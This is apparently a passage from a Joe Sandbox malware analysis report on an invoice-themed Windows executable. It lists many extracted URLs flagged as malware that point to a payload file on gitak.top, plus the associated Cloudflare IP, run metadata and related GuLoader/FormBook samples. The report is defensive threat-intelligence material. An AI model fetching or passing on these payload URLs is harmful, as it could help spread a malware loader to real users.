debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/mdebit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin/udebit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binificateChainPolicydebit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://nsis.sf.net/NSIS_ErrorErrordebit-note-19-08-dn-2024.exe, 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000000.00000000.10626867806.0000000000409000.00000008.00000001.01000000.00000003.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000000.10746285611.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDdebit-note-19-08-dn-2024.exe, 00000002.00000001.10747980655.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/adebit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binRdebit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://www.cloudflare.com/5xx-error-landingdebit-note-19-08-dn-2024.exe, 00000002.00000003.12739260417.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12633967289.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160436121.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11897223878.0000000005C03000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265722845.0000000005BF7000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15156086659.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11476497728.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000002.15713289160.0000000007570000.00000004.00000800.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14841282529.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000753780.0000000005C53000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11581843152.0000000005BFD000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.15365675266.0000000005C53000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binldebit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binkdebit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin/KGukxUu155.bindebit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binmdebit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin/adebit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin)debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binID=debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin#debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin/mdebit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binedebit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin_debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binadebit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bino(debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.quovadis.bm0debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/KGukxUu155.bin:debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://ocsp.quovadisoffshore.com0debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11054683326.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10844261064.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.10949508752.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://gitak.top/KGukxUu155.bin?odebit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin~53debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binudebit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin0debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.binurTdebit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://gitak.top/KGukxUu155.bin/debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.67.207.219
      gitak.topUnited States
      13335CLOUDFLARENETUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1499056
      Start date and time:2024-08-26 15:29:49 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 14m 11s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:debit-note-19-08-dn-2024.exe
      Detection:MAL
      Classification:mal80.troj.evad.winEXE@3/10@1/1
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:
      • Successful, ratio: 79%
      • Number of executed functions: 49
      • Number of non-executed functions: 32
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: debit-note-19-08-dn-2024.exe
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      172.67.207.219z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
        qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
          z1_____________.exeGet hashmaliciousFormBook, GuLoaderBrowse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            gitak.topdoc09125520240407073114.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 104.21.22.240
            HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
            • 172.67.207.219
            z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
            • 172.67.207.219
            _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 104.21.22.240
            qEW7hMvyV7.exeGet hashmaliciousFormBookBrowse
            • 172.67.207.219
            z9T__VAUSTRIATURK-TEKL__F.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 104.21.22.240
            z1_____________.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 172.67.207.219
            vV389MGvCt9jWzm.exeGet hashmaliciousLokibotBrowse
            • 188.114.97.3
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSPO List.htmlGet hashmaliciousUnknownBrowse
            • 172.67.172.217
